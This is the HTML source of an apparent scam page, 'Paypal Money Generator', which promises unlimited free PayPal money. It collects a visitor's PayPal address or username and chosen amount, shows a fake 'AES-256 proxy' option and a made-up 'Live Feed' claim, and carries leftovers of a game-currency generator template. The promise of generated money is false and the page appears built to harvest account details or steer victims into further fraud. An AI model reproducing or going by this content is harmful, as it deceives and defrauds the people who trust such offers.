
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="Paypal Money Generator is a cloud-based online tool. It's easy to use and user-friendly as well. This process of getting free money is hassle-free for the users. No need for any surveys or human verification. Anybody can do this online and no need for downloading anything.">
    <link rel="canonical" href="https://paypmoneygenerator.online/tool/"/>
    <title>Paypal Money Generator :- Get Unlimited Money with our Paypal Money Hack {updated}</title>
    <link rel="icon" type="image/png" href="img/favicon.png"><!--[if lt IE 9]>
    <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script><![endif]-->
    <link href="css/_bower.css" rel="stylesheet">
    <link href="css/style.css" rel="stylesheet">
    <style>
      .pending-items-box {
        /*border: 2px dashed #d23232;*/
        padding: 10px;
        margin-bottom: 20px;
        text-align: center;
        background-size: 100%;
         -webkit-border-radius: 5px;
                 border-radius: 5px;
      }
      .pending-items-box p {
        display: none;
      }
      .pending-items-box p.text {
        display: block;
        margin: 0;
        padding: 0;
        text-transform: uppercase;
        color: #fff;
        font-weight: 300;
        letter-spacing: 1px;
      }
      .pending-items-box .item {
        position: relative;
        padding: 0;
        width: 200px;
        max-width: 100%;
        margin: 5px auto;
      }
      .pending-items-box .item .left {
        position: absolute;
        top: 0;
        left: -10px;
        width: 35px;
        height: 35px;
        overflow: hidden;
        border: 2px solid #f78e04;
        -webkit-border-radius: 10000px;
                border-radius: 10000px;
        -webkit-box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.15);
                box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.15);
      }
      .pending-items-box .item .left > img {
        width: 31px;
        height: 31px;
        -webkit-border-radius: 10000px;
                border-radius: 10000px;
        border: 2px solid white;
        padding: 5px;
        background-color: white;
      }
      .pending-items-box .item .right {
        background-color: white;
        padding: 5px;
        -webkit-border-radius: 10px;
                border-radius: 10px;
        border: 1px solid #f78e04;
      }
      .updates-box {
        padding: 15px;
        background-color: #fff;
        -webkit-border-radius: 5px;
                border-radius: 5px;
        margin-bottom: 25px;
        position: relative;
        z-index: 2;
        text-align: center;
      }
      .updates-box p {
        margin: 0;
        padding: 0;
      }
      .updates-box p.heading {
        color: #000;
        text-transform: uppercase;
        letter-spacing: 1px;
        font-size: 15px;
        font-weight: 300;
        border: none;
        margin-bottom: 0;
      }
      .updates-box p.msg {
        color: #000;
        font-size: 24px;
        font-weight: 400;
      }
      .msg img:first-child {
        padding-bottom: 6px;
        width: 24px;
      }
      @media (max-width: 450px) {
        .updates-box p.msg {
          font-size: 15px;
        }
      }
      p.last-updated-msg {
        padding: 15px;
        background-color: #f78e04;
        margin-bottom: 25px;
        color: white;
        -webkit-border-radius: 5px;
                border-radius: 5px;
      }
      .custom-color{
        background-color:#f78e04  !important;
      }
      .custom-border{
        border-color:#f78e04  !important;
      }
      .custom-color-border:hover{
        background-color:#f9ab2c !important;
        border-color:#f9ab2c !important;
      }
      .custom-color-border{
        background-color:#f78e04  !important;
        border-color:#f78e04  !important;
      }
    </style>
    <!-- Hotjar Tracking Code for http://xgamemod.com/ -->
<!--<script>
    (function(h,o,t,j,a,r){
        h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
        h._hjSettings={hjid:313876,hjsv:5};
        a=o.getElementsByTagName('head')[0];
        r=o.createElement('script');r.async=1;
        r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
        a.appendChild(r);
    })(window,document,'//static.hotjar.com/c/hotjar-','.js?sv=');
</script>-->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<!--here js insert-->
    <script src="../js/scripts.js"></script>
  </head>
  <body>
    <div class="background-overlay"></div>
    <div class="container">
      <div class="row">
        <div class="col-md-8 col-md-offset-2">
          <div class="white-inside generator-section">
            <div class="heading"><img src="img/logo.png" class="top-logo">
              <h1>Paypal Money Generator</h1>
              <p class="sub">Get unlimited Money at no cost.</p>
              <p class="last-updated-msg">Version 1.48. Last Updated: <span id="date-updated">09/09/2016</span> EDT</p>
            </div>
            <p class="lead">Please fill out the form below in order for our server to generate the requested items for you.</p>
            <div class="row">
              <div class="col-md-6">
                <div class="form-group">
                  <label>1.Select the platform where are you connected</label>
                  <p class="help-block">Please choose the platform on which you connect.</p>
                  <select id="platform" class="form-control">
                  <option value="iOS">iOS</option>
                  <option value="Android">Android</option>
				  <option value="PC">PC</option>
                  </select>
                </div>
              </div>
 <div class="col-md-6">
                <div class="form-group">
                  <label for="username">2.Connect to your account</label>
                  <p class="help-block">Please enter your Paypal Address.</p>
                  <div class="row">
                    <div class="col-md-12">
                      <input id="username" placeholder="Username" type="text" class="form-control">
                    </div>
                    <!-- <div class="col-lg-4 col-md-12 col-sm-5 col-xs-12">
                      <button class="btn btn-success btn-block connect-btn">Connect</button>
                    </div> -->
                  </div>
                </div>
              </div>
            </div>
            <div class="row">
              <div class="col-sm-6">
                <div class="form-group">
                  <label for="Coins">3.Money</label>
                  <p class="help-block">Please choose the Money you want.</p>
                  <div class="input-group"><span class="input-group-addon"><span class="gen-item-icon"></span></span>
                    <select data-name="Coins" data-img="./img/Silver.png" class="gen-item form-control">
                      <option value="1,000">1,000</option>
                      <option value="5,000">5,000</option>
                      <option value="10,000">10,000</option>
                      <option value="25,000">25,000</option>
                      <option value="50,000">50,000</option>
                      <option value="99,999">99,999</option>
                    </select>
                  </div>
                </div>
              </div>
              <div class="col-sm-6">
               <!-- <div class="form-group">
                  <label for="Gems">4.Gems</label>
                  <p class="help-block">Please select an amount of Gems.</p>
                  <div class="input-group"><span class="input-group-addon"><span class="gen-item-icon"></span></span>
                    <select data-name="Gems" data-img="./img/Gold.png" class="gen-item form-control">
                      <option value="5,000">5,000</option>
                      <option value="10,000">10,000</option>
                      <option value="25,000">25,000</option>
                      <option value="50,000">50,000</option>
                      <option value="75,000">75,000</option>
                      <option value="99,999">99,999</option>
                    </select>
                  </div>
                </div> -->
              </div>
            </div>
            <div class="form-group">
              <label for="proxy">Proxy Connection (AES-256 Encryption)</label>
              <p class="help-block">This is so that the servers cannot intercept the connection.</p>
              <input type="checkbox" checked="checked" class="js-switch">
            </div>
            <button id="gen-btn" class="btn btn-block btn-lg btn-success"><i class="glyphicon glyphicon-check"></i> Start Generator</button>
          </div>
          <div class="updates-box">
            <p class="heading">Live Feed</p>
            <p class="msg">John has generated 2,500 Gems!</p>
          </div>
          <footer class="footer">
            <p>Copyright &copy; 2020 <span id="footerdom"></span>. All rights reserved. By using this tool you agree to our <a href="https://paypmoneygenerator.online/privacy-policy/">Terms of Service</a>.</p>
          </footer>
        </div>
      </div>
    </div>
    <script src="js/bower.js"></script>
    <script src="js/chance.min.js"></script>
    <script src="js/updates.js"></script>
    <script src="js/scripts.js"></script>
  </body>
</html>
